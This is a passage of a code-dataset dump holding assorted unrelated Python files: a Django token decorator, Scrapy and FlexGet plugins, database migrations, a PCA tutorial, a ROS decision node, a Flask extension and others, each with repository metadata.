' ', doc)\r\n doc = doc.strip()\r\n except Exception as e:\r\n print('*** Error[014]: ocurred in remove_rptd_wrds on row no: ', index)\r\n \r\n normalized_corpus.append(doc)\r\n print('--> preprocessing completed') \r\n return normalized_corpus\r\n \r\n\r\n\r\ndef preprocess(pData, pTktDesc, pCol):\r\n pData.columns = pData.columns.str.lower() 
\r\n pData = pData.applymap(str)\r\n \r\n pData = col_keyword(pData, pTktDesc, pCol)\r\n pData = pData.dropna(subset = [pTktDesc]) \r\n try:\r\n norm_corpus = normalize_corpus(corpus=pData[pTktDesc], html_stripping=True, contraction_expansion=True, \r\n accented_char_removal=True, text_lower_case=True, text_lemmatization=True, \r\n text_stemming=False, special_char_removal=True, remove_digits=True,\r\n custm_stpwrds= True,stopword_removal=True, ewords = True, stopwords=stopword_list,\r\n eng_words = engwords)\r\n except Exception as e:\r\n print('Error ocurred due to template')\r\n return(-1)\r\n \r\n pData['Sample'] = norm_corpus\r\n\r\n return (0,pData) \r\n \r\n\r\n\r\n\r\n\r\n","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":12012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"392994674","text":"# encoding:utf-8\n\nfrom rest_framework import permissions\nfrom rest_framework.request import Request as rfRequest\nfrom rest_framework.authentication import BaseAuthentication\nfrom api.models import customer_auth\nfrom rest_framework import HTTP_HEADER_ENCODING, exceptions\nfrom django.core.cache import cache\nfrom django.core.handlers.wsgi import WSGIRequest\nimport datetime\n\ndef checkToken(func):\n def wrapper(request, *args, **kwargs):\n token = None\n if isinstance(request, WSGIRequest):\n if 'token' in request.GET.keys():\n token = request.GET['token']\n elif 'token' in request.POST.keys():\n token = request.POST['token']\n elif isinstance(request, rfRequest):\n params = _get_parameter_dic(request)\n if 'token' in params.keys():\n token = params['token']\n else:\n if 'token' in kwargs.keys():\n token = kwargs['token']\n else:\n if len(args) == 1:\n params = _get_parameter_dic(args[0])\n if 'token' in params.keys():\n token = params['token']\n else:\n for arg in args:\n params = _get_parameter_dic(arg)\n if 'token' in params.keys():\n token = params['token']\n break\n if token is None:\n return HttpResponse(\n json.dumps({\n \"result\": False,\n \"data\": [],\n \"desc\": u\"请先登陆\",\n \"code\": 403\n }, ensure_ascii=False), content_type='application/json')\n return JsonResponse(code=403, desc=u'请先登陆')\n try:\n token = customer_auth.objects.get(token=token)\n if not token.checkToken():\n return HttpResponse(\n json.dumps({\n \"desc\": u\"Token已过期\",\n \"code\": 403\n }, ensure_ascii=False), content_type='application/json')\n return JsonResponse(code=403, desc=u'Token已过期')\n else:\n request.login_user = token.customer\n except customer_auth.DoesNotExist:\n return HttpResponse(\n json.dumps({\n \"desc\": u\"Token信息不正确\",\n \"code\": 403\n }, ensure_ascii=False), content_type='application/json')\n return JsonResponse(code=403, desc=u'Token信息不正确')\n except Exception as e:\n return HttpResponse(\n json.dumps({\n \"desc\": u\"Token信息不正确\",\n \"code\": 403\n }, ensure_ascii=False), content_type='application/json')\n return JsonResponse(code=403, desc=u'Token信息不正确')\n return func(request, *args, **kwargs)\n return wrapper\n\n\n\ndef _get_parameter_dic(request, *args, **kwargs):\n '''\n 统一处理参数\n '''\n from django.http import QueryDict\n from rest_framework.request import Request\n\n if isinstance(request, Request) == False:\n return {}\n\n query_params = request.query_params\n if isinstance(query_params, QueryDict):\n query_params = query_params.dict()\n result_data = request.data\n if isinstance(result_data, QueryDict):\n result_data = result_data.dict()\n\n if query_params != {}:\n return 
query_params\n else:\n return result_data\n","sub_path":"foods/apps/api/permission.py","file_name":"permission.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"610243892","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#\n# Copyright 2019 The FATE Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom federatedml.util import consts\nfrom federatedml.param.base_param import BaseParam\n\n\nclass PositiveUnlabeledParam(BaseParam):\n \"\"\"\n Parameters used for positive unlabeled.\n ----------\n strategy: {\"probability\", \"quantity\", \"proportion\", \"distribution\"}\n The strategy of converting unlabeled value.\n\n threshold: int or float, default: 0.9\n The threshold in labeling strategy.\n \"\"\"\n\n def __init__(self, strategy=\"probability\", threshold=0.9):\n super(PositiveUnlabeledParam, self).__init__()\n self.strategy = strategy\n self.threshold = threshold\n\n def check(self):\n base_descr = \"Positive Unlabeled Param's \"\n float_descr = \"Probability or Proportion Strategy Param's \"\n int_descr = \"Quantity Strategy Param's \"\n numeric_descr = \"Distribution Strategy Param's \"\n\n self.check_valid_value(self.strategy, base_descr,\n [consts.PROBABILITY, consts.QUANTITY, consts.PROPORTION, consts.DISTRIBUTION])\n\n self.check_defined_type(self.threshold, base_descr, [consts.INT, consts.FLOAT])\n\n if self.strategy == consts.PROBABILITY or self.strategy == consts.PROPORTION:\n self.check_decimal_float(self.threshold, float_descr)\n\n if self.strategy == consts.QUANTITY:\n self.check_positive_integer(self.threshold, int_descr)\n\n if self.strategy == consts.DISTRIBUTION:\n self.check_positive_number(self.threshold, numeric_descr)\n\n return True\n","sub_path":"python/federatedml/param/positive_unlabeled_param.py","file_name":"positive_unlabeled_param.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"622961727","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport tornado.ioloop\nimport tornado.web\nimport re\nclass MainForm(object):\n def __init__(self):\n self.host = \"(.*)\"\n self.ip = \"^(25[0-5]|2[0-4]\\d|[0-1]?\\d?\\d)(\\.(25[0-5]|2[0-4]\\d|[0-1]?\\d?\\d)){3}$\"\n self.port = \"(\\d+)\"\n self.phone = \"^1[3|4|5|8][0-9]\\d{$}$\"\n def check_valid(self,handle):\n flag = True\n value_dict ={}\n for key,regular in self.__dict__.items():\n input_value = handle.get_argument(key)\n val = re.match(regular,input_value)\n print(key,input_value, val, regular)\n if not val:\n flag =False\n value_dict[key]=input_value\n return flag, value_dict\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"index.html\")\n def post(self, *args, **kwargs):\n obj = MainForm()\n is_valid,value_dict = obj.check_valid(self)\n print(is_valid)\n if is_valid:\n print(value_dict)\n\nsettings = {\n 
'templates':'view',#模板路劲的配置\n 'static_path': 'static',#静态文件的路径\n 'static_url_prefix': '/sss/',#路劲前缀知道即可\n}\n\napplication = tornado.web.Application([\n (r\"/index\", IndexHandler),\n],**settings)\n\nif __name__ == \"__main__\":\n #socket运行起来了\n application.listen(8888)\n tornado.ioloop.IOLoop.instance().start()","sub_path":"PycharmProjects/learn/day_15_checkform/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"426898194","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\nfrom scrapy.exceptions import DropItem\nfrom elasticsearch_dsl.connections import connections\nfrom ftptree2es import settings\n\nconnections.create_connection(hosts=['http://elastic:xxxxxx@yyyyyy:9200/'])\n\nclass Ftptree2EsPipeline:\n @classmethod\n def from_crawler(cls,crawler):\n cls.connection_string = crawler.settings.get('ELASTICSEARCH_CONNECTION_STRING')\n cls.index = crawler.settings.get('ELASTICSEARCH_INDEX')\n return cls()\n\n def process_item(self, item, spider):\n item.save_to_es()\n return item\n","sub_path":"ftptree2es/ftptree2es/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"458469408","text":"from db import dbConnect\nfrom decouple import config\n\nclass Migrations:\n\n database = config('DB_DATABASE')\n\n def createDatabase(self):\n\n database = Migrations.database\n conn = dbConnect().getConnection()\n mycursor = conn.cursor()\n\n ## check table is exists or not\n mycursor.execute(\"SHOW DATABASES\")\n dbnames = []\n for x in mycursor:\n dbnames.append(x[0])\n\n ###not exist table then create db\n if database not in dbnames:\n mycursor.execute(\"CREATE DATABASE \"+database)\n print(database +\" DATABASE CREATED SUCCESSFULLY\")\n\n else:\n print(database +\" DATABASE ALREADY EXISTS\")\n\n conn.close()\n\n def createTable(self):\n conn = dbConnect().connectDB()\n mycursor = conn.cursor()\n\n ## check table is exists or not\n mycursor.execute(\"SHOW TABLES\")\n dbtables = []\n for x in mycursor:\n dbtables.append(x[0])\n\n ###not exist table then create db\n if 'random_results' not in dbtables:\n mycursor.execute(\"CREATE TABLE random_results (id INT AUTO_INCREMENT PRIMARY KEY, random_number INT(2), result_1 VARCHAR(15), result_2 VARCHAR(15))\")\n print(\"random_results TABLE CREATED SUCCESSFULLY\")\n print(\"Migrations Completed\")\n\n else:\n print(\"random_results TABLE ALREADY EXISTS\")\n print(\"No Migrations\")\n\n conn.close()\n\nmo = Migrations()\n### create db\nmo.createDatabase()\n### create db table\nmo.createTable()\n","sub_path":"scripts/migrations.py","file_name":"migrations.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"60401160","text":"#!/usr/bin/python\r\nimport sys\r\n\r\nbuilding_temps = {}\r\nhigh_temps = {}\r\nfor line in sys.stdin:\r\n line = line.strip()\r\n print(line)\r\n Time, TargetTemp, ActualTemp, BuildingID, sys_bID = line.split('\\t')\r\n Time = Time.split(':')\r\n \r\n temp_difference = abs(int(TargetTemp) - int(ActualTemp))\r\n if sys_bID in building_temps:\r\n 
building_temps[sys_bID].append(int(temp_difference))\r\n else:\r\n building_temps[sys_bID] = []\r\n building_temps[sys_bID].append(int(temp_difference))\r\n\r\n try:\r\n hours = int(Time[0])\r\n except ValueError:\r\n continue\r\n\r\n if hours > 8 and hours < 17:\r\n if BuildingID in high_temps:\r\n high_temps[BuildingID].append(int(ActualTemp))\r\n else:\r\n high_temps[BuildingID] = []\r\n high_temps[BuildingID].append(int(ActualTemp))\r\n else:\r\n continue\r\n\r\nresults = {}\r\nfor sys_bID in building_temps.keys():\r\n avg_temp_diffs = sum(building_temps[sys_bID]) * 1.0 / len(building_temps[sys_bID])\r\n\r\n if sys_bID in results:\r\n results[sys_bID].append(avg_temp_diffs)\r\n else:\r\n results[sys_bID] = []\r\n results[sys_bID].append(avg_temp_diffs)\r\n\r\nsorted_results = sorted(results.items(), key=lambda x: x[1])\r\nfor x in list(reversed(list(sorted_results)))[0:3]:\r\n print(x)\r\n\r\n# averages\r\nbuilding_temps = {}\r\nfor BuildingID in high_temps.keys():\r\n avg_high_temps = sum(high_temps[BuildingID]) * 1.0 / len(high_temps[BuildingID])\r\n if BuildingID in building_temps:\r\n building_temps[BuildingID].append(avg_high_temps)\r\n else:\r\n building_temps[BuildingID] = []\r\n building_temps[BuildingID].append(avg_high_temps)\r\n\r\nsorted_building_temps = sorted(building_temps.items(), key=lambda x: x[1])\r\nfor x in list(reversed(list(sorted_building_temps)))[0:3]:\r\n print(x)","sub_path":"PA3/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"281394969","text":"import webapp2\nimport os \nfrom google.appengine.ext import db\nfrom google.appengine.ext.webapp import template\n\nclass Counter(db.Model):\n count = db.IntegerProperty(required=True, default=0)\n \nclass MainPage(webapp2.RequestHandler):\n def get(self):\n \n a=Counter.get_by_key_name('http://learn355127.appspot.com/')\n if a is None:\n a=''\n \n b=Counter.get_by_key_name('http://video.eyny.com/index.php/video/show/cid/69/order/2/page/3DN3C67C.html')\n if b is None:\n b=''\n template_values = {'aaaa':a ,'b':b}\n render(self,'main.html',template_values)\n \nclass Read(webapp2.RequestHandler):\n def get(self):\n p = self.request.get('pid')\n \n pkon= Counter.get_by_key_name(p)\n if pkon is None:\n pkon = Counter(key_name=p)\n pkon.count =pkon.count+ 1\n pkon.put()\n self.redirect(str(p))\n\ndef render(handler, renderFile, templateValues={}): \n path = os.path.join(os.path.dirname(__file__), 'templates/', renderFile) \n handler.response.out.write(template.render(path, templateValues)) \n\napp = webapp2.WSGIApplication([('/', MainPage),\n ('/read', Read)\n ],\n debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"404043520","text":"from __future__ import unicode_literals, division, absolute_import\nfrom urlparse import urlparse\nimport logging\nfrom requests import RequestException\n\nfrom flexget import plugin\nfrom flexget.event import event\nfrom flexget.entry import Entry\n\nlog = logging.getLogger('sonarr')\n\n\nclass Sonarr(object):\n schema = {\n 'type': 'object',\n 'properties': {\n 'base_url': {'type': 'string'},\n 'port': {'type': 'number', 'default': 80},\n 'api_key': {'type': 'string'},\n 'include_ended': {'type': 'boolean', 'default': True},\n 'only_monitored': {'type': 'boolean', 'default': True},\n 'include_data': {'type': 
'boolean', 'default': False}\n },\n 'required': ['api_key', 'base_url'],\n 'additionalProperties': False\n }\n\n def transalte_quality(self, quality_name):\n \"\"\"\n Translate Sonnar's qualities to ones recognize by Flexget\n \"\"\"\n if quality_name == 'Raw-HD': # No better match yet in Flexget\n return 'remux'\n elif quality_name == 'DVD': # No better match yet in Flexget\n return 'dvdrip'\n else:\n return quality_name.replace('-', ' ').lower()\n\n def quality_requirement_builder(self, quality_profile):\n\n allowed_qualities = [self.transalte_quality(quality['quality']['name']) for quality in quality_profile['items']\n if quality['allowed']]\n cutoff = self.transalte_quality(quality_profile['cutoff']['name'])\n\n return allowed_qualities, cutoff\n\n def on_task_input(self, task, config):\n \"\"\"\n This plugin returns ALL of the shows monitored by Sonarr.\n Return ended shows by default and does not return unmonitored\n show by default.\n\n Syntax:\n\n sonarr:\n base_url=\n port=\n api_key=\n include_ended=\n only_monitored=\n include_data=\n\n Options base_url and api_key are required.\n\n Use with input plugin like discover and/or configure_series.\n Example:\n\n download-tv-task:\n configure_series:\n settings:\n quality:\n - 720p\n from:\n sonarr:\n base_url: http://localhost\n port: 8989\n api_key: MYAPIKEY1123\n discover:\n what:\n - emit_series: yes\n from:\n torrentz: any\n download:\n /download/tv\n\n Note that when using the configure_series plugin with Sonarr\n you are basically synced to it, so removing a show in Sonarr will\n remove it in flexget as well,which good be positive or negative,\n depending on your usage.\n \"\"\"\n parsedurl = urlparse(config.get('base_url'))\n url = '%s://%s:%s%s/api/series' % (parsedurl.scheme, parsedurl.netloc, config.get('port'), parsedurl.path)\n headers = {'X-Api-Key': config['api_key']}\n try:\n json = task.requests.get(url, headers=headers).json()\n except RequestException as e:\n raise plugin.PluginError('Unable to connect to Sonarr at %s://%s:%s%s. Error: %s'\n % (parsedurl.scheme, parsedurl.netloc, config.get('port'),\n parsedurl.path, e))\n entries = []\n # Retrieves Sonarr's profile list if include_data is set to true\n if config.get('include_data'):\n url2 = '%s://%s:%s%s/api/profile' % (parsedurl.scheme, parsedurl.netloc, config.get('port'), parsedurl.path)\n try:\n profiles_json = task.requests.get(url2, headers=headers).json()\n except RequestException as e:\n raise plugin.PluginError('Unable to connect to Sonarr at %s://%s:%s%s. 
Error: %s'\n % (parsedurl.scheme, parsedurl.netloc, config.get('port'),\n parsedurl.path, e))\n for show in json:\n fg_qualities = '' # Initializes the quality parameter\n fg_cutoff = ''\n path = None\n if not show['monitored'] and config.get('only_monitored'): # Checks if to retrieve just monitored shows\n continue\n if show['status'] == 'ended' and not config.get('include_ended'): # Checks if to retrieve ended shows\n continue\n if config.get('include_data') and profiles_json: # Check if to retrieve quality & path\n path = show.get('path')\n for profile in profiles_json:\n if profile['id'] == show['profileId']: # Get show's profile data from all possible profiles\n fg_qualities, fg_cutoff = self.quality_requirement_builder(profile)\n entry = Entry(title=show['title'],\n url='',\n series_name=show['title'],\n tvdb_id=show.get('tvdbId'),\n tvrage_id=show.get('tvRageId'),\n tvmaze_id=show.get('tvMazeId'),\n configure_series_target=fg_cutoff)\n if len(fg_qualities) > 1:\n entry['configure_series_qualities'] = fg_qualities\n elif len(fg_qualities) == 1:\n entry['configure_series_quality'] = fg_qualities[0]\n else:\n entry['configure_series_quality'] = fg_qualities\n if path:\n entry['configure_series_path'] = path\n if entry.isvalid():\n entries.append(entry)\n else:\n log.error('Invalid entry created? %s' % entry)\n continue\n # Test mode logging\n if entry and task.options.test:\n log.verbose(\"Test mode. Entry includes:\")\n for key, value in entry.items():\n log.verbose(' {}: {}'.format(key.capitalize(), value))\n\n return entries\n\n\n@event('plugin.register')\ndef register_plugin():\n plugin.register(Sonarr, 'sonarr', api_ver=2)\n","sub_path":"flexget/plugins/input/sonarr.py","file_name":"sonarr.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"253040716","text":"words = set()\nfor _ in range(int(input())):\n words.update(input().split())\nprint(words)\n\n\nOR\n\nn=int(input())\ns=\"\"\nfor i in range(n):\n\ts2=input()\n\ts=s+\" \"+s2\nl=s.split()\ns4=set(l)\nprint(len(s4))","sub_path":"number of distinct words in some text.py","file_name":"number of distinct words in some text.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"453833485","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 4 07:50:41 2016\n\n@author: Ryan\n\"\"\"\n\n\"Principal Component Analysis\"\n\n\"Read in data\"\nimport pandas as pd\ndf_wine = pd.read_csv('http://archive.ics.uci.edu/ml/machine-learning-databases/wine/wine.data',\n header=None)\n\n\"Separate dataset into training and test sets (70/30). 
Standardize it.\"\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nX, y = df_wine.iloc[:, 1:].values, df_wine.iloc[:, 0].values\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n\nsc=StandardScaler()\nX_train_std = sc.fit_transform(X_train)\nX_test_std = sc.fit_transform(X_test)\n\n\"Construct covariance matrix and find eigenvalues and eigenvectors\"\nimport numpy as np\ncov_mat = np.cov(X_train_std.T)\neigen_vals, eigen_vecs = np.linalg.eig(cov_mat)\nprint('\\nEigenvalues \\n%s' % eigen_vals)\n\n\"Plotting variance explained ratios of the eigenvalues (eig_i/sum of all eig_vals)\"\n\ntot = sum(eigen_vals)\nvar_exp = [(i/tot) for i in sorted(eigen_vals, reverse=True)]\ncum_var_exp = np.cumsum(var_exp)\n\nimport matplotlib.pyplot as plt\nplt.bar(range(1,14), var_exp, alpha=0.5, align='center', label='individual explained variance')\nplt.step(range(1,14), cum_var_exp, where='mid',\n label='cumulative explained variance')\nplt.ylabel('Explained variance ratio')\nplt.xlabel('Principal components')\nplt.legend(loc='best')\nplt.show()\n\n\"Sort eigenpairs by decreasing order of eigenvalues\"\neigen_pairs = [(np.abs(eigen_vals[i]), eigen_vecs[:, i]) for i in range(len(eigen_vals))]\neigen_pairs.sort(reverse=True)\n\n\"\"\"Collect the two eigenvecors that explain ~60% of variance (this is for illustrative\npurposes; normally number of eigenvectors depends on trade-off btwn computational\nefficiency and performance)\nThe resulting matrix is our transformation matrix\"\"\"\n\nw = np.hstack((eigen_pairs[0][1][:, np.newaxis],\n eigen_pairs[1][1][:, np.newaxis]))\nprint('Matrix W: \\n', w)\n\n\"Now transform the original dataset onto two principal components X' = XW\"\nX_train_pca = X_train_std.dot(w)\n\n\"And plot the dataset on PC1xPC2 coordinates\"\ncolors = ['r', 'b', 'g']\nmarkers = ['s', 'x', 'o']\nfor l, c, m in zip(np.unique(y_train), colors, markers):\n plt.scatter(X_train_pca[y_train==l, 0],\n X_train_pca[y_train==l, 1],\n c=c, label=l, marker=m)\nplt.xlabel('PC 1')\nplt.ylabel('PC 2')\nplt.legend(loc='lower left')\nplt.show()\n\n\n","sub_path":"PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"290886273","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom scrapy.spiders import Spider\nfrom scrapy.spiders import Request\nimport json\nfrom hexun.items import HexunItem\nfrom utils.urlUtils import UrlUtils\nfrom utils.dateTimeUtils import DateTimeUtils\n\nclass MASpider(Spider):\n name = 'ma'\n urlTemplate='http://webftcn.hermes.hexun.com/shf/minute?code=CZCEma{0}&start={1}&number=570&t=1513836362966'\n start_urls = [\n\n ]\n allowed_domains = ['*.hexun.com']\n\n def start_requests(self):\n contractList = DateTimeUtils.getContractList()\n for contract in contractList:\n url = self.urlTemplate.format(contract, DateTimeUtils.getStartTime())\n yield Request(url=url, callback=self.parseItem)\n\n def parseItem(self, response):\n jsonData = json.loads(response.body_as_unicode().strip(';').strip('(').strip(')'))\n datas = jsonData['Data'][0]\n contractCode=self.getContractName(response)\n for dataItem in datas:\n lldpeItem = HexunItem()\n lldpeItem['product'] = contractCode\n lldpeItem['dateTime'] = dataItem[0]\n lldpeItem['price'] = dataItem[1]\n lldpeItem['amount'] = dataItem[2]\n lldpeItem['volumn'] = dataItem[3]\n lldpeItem['avePrice'] = dataItem[4]\n 
lldpeItem['openInterest'] = dataItem[5]\n yield lldpeItem\n\n def getContractName(self, response):\n code = UrlUtils.getQueryValue(response.url, 'code')[-4:]\n return self.name + code\n","sub_path":"hexun/hexun/spiders/maSpider.py","file_name":"maSpider.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"160406676","text":"#!/usr/bin/env python\n\nimport rospy\nimport tf\nfrom pi_trees_ros.pi_trees_ros import *\nfrom pi_trees_lib.task_setup import *\nimport referee_pb2\n\nrospy.init_node('decision_maker') # write this line before import GlobalData\n\nimport GlobalData\nimport Halt\nimport Stopgame\nimport Forcestart\nimport KickoffFriend\nimport KickoffEnemy\nimport PenaltyFriend\nimport PenaltyEnemy\nimport IndirectFriend\nimport IndirectEnemy\nimport DirectFriend\nimport DirectEnemy\nimport TimeoutFriend\nimport TimeoutEnemy\nimport GoalFriend\nimport GoalEnemy\n\nimport geometry_msgs.msg\nimport std_msgs.msg\nfrom tf.transformations import quaternion_from_euler\nfrom std_msgs.msg import Int8\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import String\nfrom nav_msgs.msg import Odometry\nfrom roots_msgs.msg import nodeData\nfrom roots_msgs.msg import nodeDataArray\n\n\ndef publish():\n header = std_msgs.msg.Header()\n header.stamp = rospy.Time.now()\n header.frame_id = 'map'\n\n if GlobalData.GlobalData.is_velocity_control:\n msg = geometry_msgs.msg.TwistStamped()\n msg.header = header\n msg.twist = GlobalData.GlobalData.target_velocity\n pub_velocity.publish(msg)\n pub_control_mode.publish(std_msgs.msg.String('velocity'))\n\n else:\n send_pose = GlobalData.GlobalData.tf_listener.transformPose('map', GlobalData.GlobalData.target_pose)\n send_pose.header.stamp = rospy.Time.now()\n pub_position.publish(send_pose)\n pub_control_mode.publish(std_msgs.msg.String('position'))\n\n pub_kick_velocity.publish(std_msgs.msg.Float32(GlobalData.GlobalData.kick_velocity))\n \n pub_nodes.publish(G_nodeArray)\n\n\ndef refboxCallback(msg):\n global global_data\n global_data.setRefCommand(msg.data)\n\n\ndef ballCallback(msg):\n global global_data\n global_data.setBallInfo(msg)\n\n\ndef logChildren(parent):\n for child in parent.children:\n node = nodeData()\n node.parentName = parent.name\n node.myName = child.name\n node.myType = child.node_type\n if child.status is None:\n node.myStatus = 3\n else:\n node.myStatus = child.status\n\n global G_nodeArray\n G_nodeArray.nodes.append(node)\n\n logChildren(child)\n\ndef main():\n # plays\n halt = Halt.Halt('Halt')\n stop_game = Stopgame.Stopgame('Stop game')\n force_start = Forcestart.Forcestart('Force start')\n kickoff_friend = KickoffFriend.KickoffFriend('KickoffFriend')\n kickoff_enemy = KickoffEnemy.KickoffEnemy('KickoffEnemy')\n penalty_friend = PenaltyFriend.PenaltyFriend('PenaltyFriend')\n penalty_enemy = PenaltyEnemy.PenaltyEnemy('PenaltyEnemy')\n indirect_friend = IndirectFriend.IndirectFriend('IndirectFriend')\n indirect_enemy = IndirectEnemy.IndirectEnemy('IndirectEnemy')\n direct_friend = DirectFriend.DirectFriend('DirectFriend')\n direct_enemy = DirectEnemy.DirectEnemy('DirectEnemy')\n timeout_friend = TimeoutFriend.TimeoutFriend('TimeoutFriend')\n timeout_enemy = TimeoutEnemy.TimeoutEnemy('TimeoutEnemy')\n goal_friend = GoalFriend.GoalFriend('GoalFriend')\n goal_enemy = GoalEnemy.GoalEnemy('GoalEnemy')\n\n behavior_tree = Selector(\"Behavior\")\n behavior_tree.add_child(halt)\n behavior_tree.add_child(stop_game)\n 
behavior_tree.add_child(force_start)\n\n behavior_tree.add_child(kickoff_friend)\n behavior_tree.add_child(kickoff_enemy)\n\n behavior_tree.add_child(penalty_friend)\n behavior_tree.add_child(penalty_enemy)\n\n behavior_tree.add_child(indirect_friend)\n behavior_tree.add_child(indirect_enemy)\n\n behavior_tree.add_child(direct_friend)\n behavior_tree.add_child(direct_enemy)\n\n behavior_tree.add_child(timeout_friend)\n behavior_tree.add_child(timeout_enemy)\n\n behavior_tree.add_child(goal_friend)\n behavior_tree.add_child(goal_enemy)\n\n\n r = rospy.Rate(10)\n\n print_tree(behavior_tree, 0, True)\n\n while not rospy.is_shutdown():\n behavior_tree.run()\n r.sleep()\n\n logChildren(behavior_tree)\n\n publish()\n global G_nodeArray\n G_nodeArray.nodes = []\n\n rospy.loginfo('==========================')\n\n\n\nif __name__ == '__main__':\n\n pub_control_mode = rospy.Publisher('/robot_0/roots_2dnav_pid/control_mode', std_msgs.msg.String, queue_size=10)\n pub_position = rospy.Publisher('/robot_0/move_base_simple/goal', geometry_msgs.msg.PoseStamped, queue_size=10)\n pub_velocity = rospy.Publisher('/robot_0/move_base_simple/target_velocity', geometry_msgs.msg.TwistStamped, queue_size=10)\n pub_kick_velocity = rospy.Publisher('/robot_0/kick_velocity', std_msgs.msg.Float32, queue_size=10)\n\n pub_nodes = rospy.Publisher('node_data_array',nodeDataArray,queue_size=10)\n # Subscriber\n sub_refbox_command = rospy.Subscriber(\"/refbox/command\", Int8, refboxCallback)\n sub_ball = rospy.Subscriber(\"/ball_observer/estimation\", Odometry, ballCallback)\n\n friend_color = rospy.get_param(\"/friend_color\")\n\n global_data = GlobalData.GlobalData()\n GlobalData.GlobalData.setFriendColor(friend_color)\n\n G_nodeArray = nodeDataArray()\n\n main()\n","sub_path":"roots_decision_making/scripts/roots_decision_making_node.py","file_name":"roots_decision_making_node.py","file_ext":"py","file_size_in_byte":5147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"598383248","text":"# -*- coding: utf-8 -*-\n\n\"\"\"An extension to Flask-SQLAlchemy.\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\n\nfrom flask import Flask, current_app\nfrom flask_security import SQLAlchemyUserDatastore\nfrom flask_sqlalchemy import SQLAlchemy\nfrom werkzeug.local import LocalProxy\n\nfrom ..manager import WebManager\nfrom ..models import User\n\n__all__ = [\n 'PyBELSQLAlchemy',\n 'manager',\n 'user_datastore',\n]\n\nlogger = logging.getLogger(__name__)\n\n\nclass PyBELSQLAlchemy(SQLAlchemy):\n \"\"\"An extension of Flask-SQLAlchemy to support the BEL Commons manager.\"\"\"\n\n def init_app(self, app: Flask) -> None:\n \"\"\"Initialize a Flask app.\"\"\"\n super().init_app(app)\n\n with app.app_context():\n _manager = app.extensions['manager'] = WebManager(engine=self.engine, session=self.session)\n _manager.bind()\n\n _admin = _manager.user_datastore.find_or_create_role('admin')\n\n _butler_email = app.config['BUTLER_EMAIL']\n _butler_name = app.config['BUTLER_EMAIL']\n _butler_password = app.config['BUTLER_EMAIL']\n _butler: User = _manager.user_datastore.find_user(email=_butler_email)\n if _butler is not None:\n logger.debug('butler user: %s', _butler)\n if _butler is None:\n logger.info('creating user: %s (%s)', _butler_name, _butler_email)\n _manager.user_datastore.create_user(\n email=_butler_email,\n name=_butler_name,\n password=_butler_password,\n )\n _manager.user_datastore.commit()\n\n _manager.sanitize(user=_butler, 
